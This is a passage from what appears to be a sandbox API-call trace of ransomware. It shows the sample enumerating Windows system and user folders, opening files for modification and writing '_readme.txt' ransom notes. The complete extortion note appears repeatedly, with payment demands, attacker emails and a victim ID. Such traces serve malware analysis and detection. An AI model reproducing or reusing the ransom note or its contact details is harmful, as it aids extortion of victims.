private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.845] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.845] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.845] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0228.846] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0228.846] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0228.846] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0228.846] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.846] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0228.846] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.846] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.846] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.847] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.847] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0228.847] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.847] PathFindFileNameW (pszPath="") returned="" [0228.847] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.847] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.847] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.847] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.847] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0228.847] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0228.848] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.848] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.848] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.848] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.848] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.849] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.849] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.849] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.849] PathFindFileNameW (pszPath="") returned="" [0228.849] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.849] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.849] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.850] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.850] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.850] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0228.850] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.850] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.850] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.850] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.850] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.850] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0228.850] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.850] PathFindFileNameW (pszPath="") returned="" [0228.850] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.851] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.851] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.851] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.851] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0228.851] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0228.851] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.851] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.851] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.851] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.851] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0228.852] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.852] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.852] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.852] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, 